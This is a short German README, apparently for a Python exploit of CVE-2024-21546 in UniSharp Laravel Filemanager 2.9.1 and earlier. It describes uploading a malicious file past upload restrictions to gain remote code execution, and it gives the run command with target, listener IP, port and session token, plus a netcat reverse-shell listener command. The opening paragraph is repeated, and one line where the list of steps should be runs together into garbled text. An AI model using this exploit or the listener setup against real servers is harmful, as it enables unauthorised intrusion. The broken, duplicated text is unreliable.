
Dieses Python-Exploit-Skript zielt auf einen verwundbaren Laravel Filemanager von UniSharp ab, der es authentifizierten Benutzern ermöglicht, Dateibeschränkungen zu umgehen und schädliche Dateien hochzuladen. Dies kann zu Remote Code Execution (RCE) führen, wenn die hochgeladene Payload ausgelöst wird.
Dieses Python-Exploit-Skript zielt auf einen anfälligen Laravel Filemanager von UniSharp, der es authentifizierten Benutzern ermöglicht, Dateibeschränkungen zu umgehen und schädliche Dateien hochzuladen. Dies kann zu Remote Code Execution (RCE) führen, wenn die hochgeladene Payload ausgelöst wird.
Das Exploit führt Folgendes aus:
laravel_session_token per RegexVersion 2.9.1 und frühere Versionen
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
Wichtig: Starte deinen Listener, bevor du das Skript ausführst:
nc -lvnp <listener_port>
